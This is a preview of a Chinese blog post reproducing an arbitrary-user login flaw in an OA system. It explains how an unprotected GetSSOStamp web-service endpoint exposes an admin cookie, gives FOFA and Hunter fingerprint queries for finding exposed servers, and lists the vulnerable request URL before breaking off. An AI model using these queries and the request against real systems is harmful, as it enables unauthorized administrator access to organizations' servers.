某联达OA任意用户登录漏洞复现

  • 开发
  • 22

文章目录

一、漏洞描述

由于/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmj接口未作限制,导致可以通过该接口调用admincookie值,通过对LoginCredenceLoginTimestamp的参数修改,进而实现任意登录进去系统.

二、漏洞查询

fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==”
body=”/Services/Identification/Server”
hunter:web.body=”/Services/Identification/Server/“

在这里插入图片描述

三、漏洞复现

第一步访问页面

image.png

第二步访问接口
http://ip:8888/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx?op=GetStamp

url后拼接/WebService/Lk6SyncService/DirectToOthe

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-17 19:28:05       67 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-17 19:28:05       72 阅读

  9. 在Django里面运行非项目文件

    2024-07-17 19:28:05       58 阅读

  19. Python语言-面向对象

    2024-07-17 19:28:05       69 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-17 19:28:05       64 阅读

热门阅读

  6. Qt Style Sheets-样式表语法

    2024-07-17 19:28:05       18 阅读

  12. 高并发服务器-使用多进程(Multi-Process)实现【C语言】

    2024-07-17 19:28:05       28 阅读

  15. vue3中常用组件封装及使用

    2024-07-17 19:28:05       21 阅读

  19. SpringBoot+HttpClient实现文件上传下载

    2024-07-17 19:28:05       22 阅读

  21. 根据语义切分视频

    2024-07-17 19:28:05       17 阅读

  22. 量化交易对市场波动的反应机制

    2024-07-17 19:28:05       19 阅读

  27. Html_Css问答集(11)

    2024-07-17 19:28:05       18 阅读